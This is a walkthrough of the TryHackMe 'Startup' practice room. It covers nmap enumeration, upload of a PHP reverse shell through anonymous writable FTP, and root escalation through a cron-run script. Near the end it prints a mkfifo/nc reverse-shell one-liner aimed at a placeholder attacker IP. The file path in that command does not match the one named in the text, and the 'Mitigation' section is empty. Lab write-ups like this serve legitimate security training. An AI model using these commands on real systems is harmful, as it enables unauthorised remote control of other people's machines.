Startup is a room with the difficulty “Easy”. It can be played on TryHackMe. Initial access has been done via uploading a reverse shell on the FTP server and running it through the web server. The privilege escalation to root could be accomplished through write privileges for a script that was being run by the root user as a conjob.

Enumeration

sudo nmap -oN nmap -sC -sV 10.10.86.86

The output of this scan will be the following:

Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-07 15:28 EST
Nmap scan report for localhost (10.10.86.86)
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxrwx 2 65534 65534 4096 Nov 12 04:53 ftp [NSE: writeable]
| -rw-r--r-- 1 0 0 251631 Nov 12 04:02 important.jpg
|_-rw-r--r-- 1 0 0 208 Nov 12 04:53 notice.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.9.73.174
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b9:a6:0b:84:1d:22:01:a4:01:30:48:43:61:2b:ab:94 (RSA)
| 256 ec:13:25:8c:18:20:36:e6:ce:91:0e:16:26:eb:a2:be (ECDSA)
|_ 256 a2:ff:2a:72:81:aa:a2:9f:55:a4:dc:92:23:e6:b4:3f (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Maintenance
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.86 seconds

As you can see an FTP server is running on port 21, an SSH server is running on port 22 and a web server is running on port 80. Also anonymous login is activated on the FTP server. Now try to log in with the following command and the username “anonymous” and a blank password:

ftp 10.10.86.86

As you can see there is a “notice.txt” and a JPG file. Furthermore we have write access to the “ftp” directory. With a dirb scan on the web server we could find out that the “ftp” directory is mapped to http://10.10.86.86/files/ on the web server:

Initial Access

nc -lvnp 1234

Finally run the reverse shell by calling http://10.10.86.86/files/shell.php. After that you should have a shell on the machine.

Inside the root directory (“/”) there is a file called “recipe.txt”. This file contains the secret recipe. Also there is a interesting directory. It is called “incidents”. This directory contains a Pcap file which we can download and analyze with Wireshark. The pcap file is a packet capture of a security incident. It also contains lennie ‘s password in plain text:

With these credentials we can log in as lennie and get the user flag. Inside lennie’s home folder there is a folder called “scripts”. This folder contains a script called as “planner.sh”. It is owned by root. From that script the script /etc/print.sh is called. We have write permissions for that script. So we can try our luck and place the following reverse shell inside this file:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_MACHINE_TUN0_IP 4444 >/tmp/f' >> /tmp/print.sh

After that start a reverse shell on port 4444 on your attacker machine. Finally you should get a root shell. With that you will be able to read the root flag.

Mitigation

Passionate about Cyber Security. I am publishing CTF writeups and Cybersec content!